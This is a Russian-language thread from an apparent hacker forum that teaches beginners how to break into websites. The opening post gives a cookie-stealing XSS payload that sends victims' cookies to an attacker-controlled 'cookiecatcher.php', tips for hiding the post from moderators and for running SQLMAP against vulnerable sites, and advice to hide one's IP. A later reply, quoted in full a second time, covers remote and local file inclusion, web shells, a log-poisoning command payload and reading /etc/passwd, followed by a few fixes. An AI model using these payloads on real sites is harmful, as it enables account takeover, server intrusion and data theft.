• Начинающий хакер, спасибо что зашёл к нам! Для полного удобства рекомендуем Вам сразу же зарегистрироваться. Помните, необходимо придумать сложный пароль к своему логину, в котором будут присутствовать цифры, а так же символы. После регистрации вы сможете пользоваться чатом. Так же не забудьте активировать аккаунт через письмо, высланное вам на почту ! Администрация заботится о каждом из Вас...
  • Для просмотра разделов из категории Private Informations & Programms необходимо купить

Способы взлома сайтов

Статус
В этой теме нельзя размещать новые ответы.

Gidroponika

Ваши вопросы в Telegram: @milliontri22
Топовый

Gidroponika

Ваши вопросы в Telegram: @milliontri22
Топовый
Регистрация
28 Янв 2017
Сообщения
730
Реакции
834
Reputation
0
Баллы
5
Сейчас я расскажу о настоящих ,рабочих способах атак ,которыми можно взломать сайт :

1) Применение межсайтового скриптинга.

Найдите уязвимый сайт,на котором можно размещать контент. Хороший пример - доска объявлений. Помните, если сайт хорошо защищен, это не сработает.


Перейдите к созданию поста. Вам нужно в тело поста вставить специальный код, собирающий данные тех, кто на него кликнет.
Вы захотите проверить, отсеивает ли система код. Опубликуйте <script...>alert(“test”)</...script> (не забудьте убрать “…”). Если при нажатии на свой пост появляется окно с предупреждением, тогда этот сайт уязвим для атаки.

Создайте и загрузите свой PHP-скрипт ,который будет получать данные
Цель этой атаки - собрать пользовательские данные типа "cookie", хранящие информацию об учетных записях пользователей. Ее можно использовать для входа в их аккаунты на уязвимых веб-сайтах. Вам потребуется php-скрипт, который будет воровать куки вашей цели и перенаправлять их на ваш сайт. Загрузите php-скрипт на веб-сайт, к которому у вас есть доступ и который поддерживает php. Пример кода php-скрипта можно найти в разделе "Примеры".



Опубликуйте JavaScript-код.

Введите в тело поста JavaScript-код, который будет воровать куки и отправлять их на ваш сайт. Чтобы сделать пост менее подозрительным и уберечь его от удаления, после кода впишите какой-нибудь текст.

Пример кода будет выглядеть следующим образом: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”ВАШURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (удалите ...).Введите в тело поста JavaScript-код, который будет воровать куки и отправлять их на ваш сайт. Чтобы сделать пост менее подозрительным и уберечь его от удаления, после кода впишите какой-нибудь текст.

Пример кода будет выглядеть следующим образом: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”ВАШURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (удалите ...).



Использование полученных куки. После этого можете использовать сохраненные у вас на веб-сайте данные куки для любых целей.


XSS ( Межсайтовый скриптинг ) НЕ ЯВЛЯЕТСЯ СЕРЬЁЗНОЙ УГРОЗОЙ ДЛЯ САЙТА.


2) SQL injection

Взлом сайта путём использования ошибки в коде сайта ,в ходе атаки можно получить все данные из базы данных сайта,пароли ,логины и т.д.

Чтобы не сидеть и не искать вручную на сайте уязвимость можно и нужно использовать вспомогательные программы ,которых в интернете куча,например : Cyd Network , Acunetix Web Vulnerability Scanner.

Также для взлома нам понадобиться программа SQLMAP - СКАЧАТЬ С ОФИЦИАЛЬНОГО САЙТА

Находим уязвимую ссылку ,вставляем в программу SQLMAP и ждём пока программа взломает сайт.

В интернете полно уроков,гайдов по взлому сайтов данным способом.

ОТЛИЧНЫЙ СПОСОБ ДЛЯ ВЗЛОМА САЙТА.


Выучите один или несколько языков программирования. Если вы действительно хотите научится взламывать веб-сайты, вам нужно понять принцип работы компьютера и других технологий. Изучите такие языки программирования, как Python или SQL, они позволят вам лучше владеть компьютером и найти слабые места систем.


Изучите язык HTML на базовом уровне. Чтобы взламывать веб-сайты, вам нужно иметь четкое представление о языках html и javascript. Это требует немало времени, но в интернете достаточно бесплатных способов для изучения, поэтому главное - желание, а возможности всегда найдутся


Проконсультируйтесь с "Белыми" хакерами . "Белые" хакеры - это те, кто использует свои знания на благо добра, выявляя уязвимости систем безопасности и делая этим Интернет лучшим местом для всех. Если вы хотите научиться взлому, чтобы использовать его на благо добра или защитить ваш собственный веб-сайт, возможно, вам понадобится консультация "белых" хакеров. Если вы читаете данную тему,значит,Вас интересует взлом сайтов,поэтому можно попробовать выманить у "Белых" хакеров некоторые способы ,которыми они сами пользуются, например под предлогом "Вот вы нашли уязвимость под названием "Название уязвимости" подскажите,что это за уязвимость и как можно в дальнейшем её выявить на других своих проектах. Думаю они подскажут Вам!


Если вы хотите стать хакером, вам предстоит во многом разобраться. На данный момент существует множество дыр в безопасности веб-сайтов и их список пополняется с каждым днем, поэтому вы постоянно должны обучаться.

Поскольку список возможных путей взлома постоянно меняется, вы должны идти в ногу со временем. Если сейчас некоторые сайты хорошо защищены ,это не значит,что завтра не появится уязвимость,с помощью которой взломают эти сайты.

Если вы решили испробовать свои хакерские навыки в реальном мире, не забудьте скрыть свой IP-адрес с помощью программного обеспечения, доступного в сети Интернет.
 
Последнее редактирование модератором:

Optimist

Пользователь
Местный

Optimist

Пользователь
Местный
Регистрация
25 Янв 2017
Сообщения
81
Реакции
5
Reputation
0
Баллы
2
Весьма познавательно
 

Ivan Kot

Пользователь
Местный

Ivan Kot

Пользователь
Местный
Регистрация
7 Апр 2017
Сообщения
12
Реакции
2
Reputation
0
Баллы
2
Спасибо
 

po6oT

Пользователь
Пользователь

po6oT

Пользователь
Пользователь
Регистрация
8 Апр 2017
Сообщения
5
Реакции
9
Reputation
0
Баллы
2
А как же php?
 

Invincible12

Руководитель проекта dark-forum.net
Команда форума
Администратор

Invincible12

Руководитель проекта dark-forum.net
Команда форума
Администратор
Регистрация
21 Авг 2015
Сообщения
9,011
Реакции
573
Reputation
20
Баллы
5
Telegram
@-
po6oT, можете дополнить тему с PHP :)
 

po6oT

Пользователь
Пользователь

po6oT

Пользователь
Пользователь
Регистрация
8 Апр 2017
Сообщения
5
Реакции
9
Reputation
0
Баллы
2
Invincible12,
po6oT, можете дополнить тему с PHP :)

PHP - injection

PHP-инъекция (англ. PHP injection) — один из способов взлома веб-сайтов, работающих на PHP, заключающийся в выполнении постороннего кода на серверной стороне. Потенциально опасными функциями являются:
  • eval(),
  • preg_replace() (с модификатором «e»),
  • require_once(),
  • include_once(),
  • include(),
  • require(),
  • create_function().

PHP-инъекция становится возможной, если входные параметры принимаются и используются без проверки.

Пример кривого кода:
Код:
<?
...
$module = $_GET['module'];
include $module . '.php';
...
?>
С помощью этой ошибки мы можем подставить свой ядовитый код со своего сайта и выполнить инъекцию удаленно - это называется глобальный инклуд.


и видим ошибку такого плана:

  • Warning: include_once(pidori) [function.include-once]: failed to open stream: No such file or directory in /home/catenabrasil/www/portal/index.php on line 69
  • Warning: include_once() [function.include]: Failed opening 'wert' for inclusion (include_path='.:/usr/share/pear/:/usr/lib/php/') in /home/catenabrasil/www/portal/index.php on line 69

Это 90% уязвимый сайт.
Подставляем вместо параметра foto линк на наш сайт на народе (сайт недолжен поддерживать php скрипты иначе будет все выполнятся на нашем сайте, а не на сайте жертвы) с заранее залитым веб шелом...

Я используюю c99shell и r57shell...
И если все верно то мы получаем веб шелл... Сайт у нас в руках))

Локальный PHP - инклуд

Позволяет злоумышленнику инклудить файлы лежащие на сервере.

Пример кривого кода:

Код:
<?php
   include("include/$file");
?>
С помощью этого бага возможно инклудить т.е читать файлы на серваке... Например на сайте можно загружать файлы с любым разрешением, и мы имеем возможность загрузить свой php код и проинклудить его получив веб шелл, или прочитать логи ошибок сервака, например в лог идут все ошибки 404... мы подставляем в линк сайта свой php код <?php system($_GET[cmd]) ?> и он выдает нам ошибку 404... мы инклудим лог и получаем веб шелл CMD...
  • Warning: main(files/content/qwer) [function.main]: failed to open stream: No such file or directory in /home/u3/bmohler/html/index.php on line 38
  • Инклудим файл /etc/passwd - http://site.ru/index.php?page=../../../etc/passwd и видим примерно такое
Код:
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $ # root:*:0:0::/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin operator:*:2:5:System &:/:/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin news:*:8:8:News Subsystem:/:/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin bind:*:53:53:Bind
Это мы произвели инклуд /etc/passwd...
Таким же образом можно проинклудить логи ошибок и БД...
Копипаста:k32005:
Видео:

Существует несколько способов защиты от такой атаки:
  • Проверять, не содержит ли переменная $module посторонние символы:
Код:
<?
...
$module = $_GET['module'];
if (strpbrk($module, '.?/:')) die('Blocked');
include $module. '.php';
...
?>
  • Проверять, что $module присвоено одно из допустимых значений:
Код:
<?
...
$module = $_GET['module'];
$arr = array('main', 'about', 'links', 'forum');
if (!in_array($module,$arr)) $module = $arr[0];
include $module . '.php';
...
?>
Этот способ является более эффективным, красивым и аккуратным.

  • Прописать каждое значение через if
Код:
<?
...
$module = $_GET['module'];
$arr = array('main', 'about', 'links', 'forum');
if (!in_array($module,$arr)) $module = $arr[0];
include $module . '.php';
...
?>
  • Использовать оператор switch:
Код:
<?
...
$module = $_GET['module'];
switch($module){
case 'main': include 'main.php'; break;
case 'about': include 'about.php'; break;
case 'links': include 'links.php'; break;
case 'forum': include 'forum.php'; break;
default: include 'main.php';
}
...
?>
Это решение аналогично решению с if, но имеет более компактную запись.

PHP предоставляет также возможность отключения использования удаленных файлов, это реализуется путём изменения значения опции allow_url_fopen на Off в файле конфигурации сервера php.ini.

Описанная уязвимость представляет высокую опасность для сайта и авторам PHP-скриптов не надо забывать про неё.

 

Andrei17mak

Пользователь
Местный

Andrei17mak

Пользователь
Местный
Регистрация
14 Июн 2017
Сообщения
27
Реакции
1
Reputation
0
Баллы
2
Попробую...
 

guest

Гость
Местный

guest

Гость
Местный
Регистрация
18 Июн 2017
Сообщения
15
Реакции
3
Reputation
0
Баллы
2
Хороший гайд. Спасибо
 

ShowDI

Пользователь
Пользователь

ShowDI

Пользователь
Пользователь
Регистрация
18 Июн 2017
Сообщения
9
Реакции
0
Reputation
0
Баллы
1
Можно получить файлы шелл?
или я просто слепой не нашел в теме
 

Saper7779

Пользователь
Местный

Saper7779

Пользователь
Местный
Регистрация
24 Июн 2017
Сообщения
86
Реакции
3
Reputation
0
Баллы
2
Есть успехи?
 

Skamka

Пользователь
Пользователь

Skamka

Пользователь
Пользователь
Регистрация
21 Июл 2017
Сообщения
10
Реакции
0
Reputation
0
Баллы
1
Спасибо за гайд)
 

TomaSS

Топовый

TomaSS

Топовый
Регистрация
1 Июл 2017
Сообщения
167
Реакции
50
Reputation
0
Баллы
2
Telegram
@tom213
Битые скрины
 

shmykov

Пользователь
Пользователь

shmykov

Пользователь
Пользователь
Регистрация
15 Июл 2017
Сообщения
2
Реакции
0
Reputation
0
Баллы
1
Кто может знает? можно из простого шелла со всеми правами сделать прокси?
 

plexcetre

Пользователь
Пользователь

plexcetre

Пользователь
Пользователь
Регистрация
27 Июн 2017
Сообщения
10
Реакции
0
Reputation
0
Баллы
1
Кто может знает? можно из простого шелла со всеми правами сделать прокси?
Я думаю если и возможно, то только http\https, но socks никак не сделаешь чисто из шелла,хотя я может что то не знаю
 

Goose

Пользователь
Пользователь

Goose

Пользователь
Пользователь
Регистрация
22 Июл 2017
Сообщения
2
Реакции
0
Reputation
0
Баллы
1
Всем привет я только зашёл на сайт и нечего не понимаю можете мне помочь в этом кому не тркдно
 

StranniyTip

Пользователь
Пользователь

StranniyTip

Пользователь
Пользователь
Регистрация
31 Июл 2017
Сообщения
7
Реакции
0
Reputation
0
Баллы
1
Invincible12,

PHP - injection

PHP-инъекция (англ. PHP injection) — один из способов взлома веб-сайтов, работающих на PHP, заключающийся в выполнении постороннего кода на серверной стороне. Потенциально опасными функциями являются:
  • eval(),
  • preg_replace() (с модификатором «e»),
  • require_once(),
  • include_once(),
  • include(),
  • require(),
  • create_function().

PHP-инъекция становится возможной, если входные параметры принимаются и используются без проверки.

Пример кривого кода:
Код:
<?
...
$module = $_GET['module'];
include $module . '.php';
...
?>
С помощью этой ошибки мы можем подставить свой ядовитый код со своего сайта и выполнить инъекцию удаленно - это называется глобальный инклуд.


и видим ошибку такого плана:

  • Warning: include_once(pidori) [function.include-once]: failed to open stream: No such file or directory in /home/catenabrasil/www/portal/index.php on line 69
  • Warning: include_once() [function.include]: Failed opening 'wert' for inclusion (include_path='.:/usr/share/pear/:/usr/lib/php/') in /home/catenabrasil/www/portal/index.php on line 69

Это 90% уязвимый сайт.
Подставляем вместо параметра foto линк на наш сайт на народе (сайт недолжен поддерживать php скрипты иначе будет все выполнятся на нашем сайте, а не на сайте жертвы) с заранее залитым веб шелом...

Я используюю c99shell и r57shell...
И если все верно то мы получаем веб шелл... Сайт у нас в руках))

Локальный PHP - инклуд

Позволяет злоумышленнику инклудить файлы лежащие на сервере.

Пример кривого кода:

Код:
<?php
   include("include/$file");
?>
С помощью этого бага возможно инклудить т.е читать файлы на серваке... Например на сайте можно загружать файлы с любым разрешением, и мы имеем возможность загрузить свой php код и проинклудить его получив веб шелл, или прочитать логи ошибок сервака, например в лог идут все ошибки 404... мы подставляем в линк сайта свой php код <?php system($_GET[cmd]) ?> и он выдает нам ошибку 404... мы инклудим лог и получаем веб шелл CMD...
  • Warning: main(files/content/qwer) [function.main]: failed to open stream: No such file or directory in /home/u3/bmohler/html/index.php on line 38
  • Инклудим файл /etc/passwd - http://site.ru/index.php?page=../../../etc/passwd и видим примерно такое
Код:
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $ # root:*:0:0::/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin operator:*:2:5:System &:/:/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin news:*:8:8:News Subsystem:/:/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin bind:*:53:53:Bind
Это мы произвели инклуд /etc/passwd...
Таким же образом можно проинклудить логи ошибок и БД...
Копипаста:k32005:
Видео:

Существует несколько способов защиты от такой атаки:
  • Проверять, не содержит ли переменная $module посторонние символы:
Код:
<?
...
$module = $_GET['module'];
if (strpbrk($module, '.?/:')) die('Blocked');
include $module. '.php';
...
?>
  • Проверять, что $module присвоено одно из допустимых значений:
Код:
<?
...
$module = $_GET['module'];
$arr = array('main', 'about', 'links', 'forum');
if (!in_array($module,$arr)) $module = $arr[0];
include $module . '.php';
...
?>
Этот способ является более эффективным, красивым и аккуратным.

  • Прописать каждое значение через if
Код:
<?
...
$module = $_GET['module'];
$arr = array('main', 'about', 'links', 'forum');
if (!in_array($module,$arr)) $module = $arr[0];
include $module . '.php';
...
?>
  • Использовать оператор switch:
Код:
<?
...
$module = $_GET['module'];
switch($module){
case 'main': include 'main.php'; break;
case 'about': include 'about.php'; break;
case 'links': include 'links.php'; break;
case 'forum': include 'forum.php'; break;
default: include 'main.php';
}
...
?>
Это решение аналогично решению с if, но имеет более компактную запись.

PHP предоставляет также возможность отключения использования удаленных файлов, это реализуется путём изменения значения опции allow_url_fopen на Off в файле конфигурации сервера php.ini.

Описанная уязвимость представляет высокую опасность для сайта и авторам PHP-скриптов не надо забывать про неё.

Круто
 

AxeMan

228gbps#8871
Команда форума
Мл.Модератор

AxeMan

228gbps#8871
Команда форума
Мл.Модератор
Регистрация
23 Июл 2017
Сообщения
77
Реакции
21
Reputation
0
Баллы
2
Telegram
@@Axe187
Есть кто сможет показать это в скайпе как это происходит был бы благадарин.
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу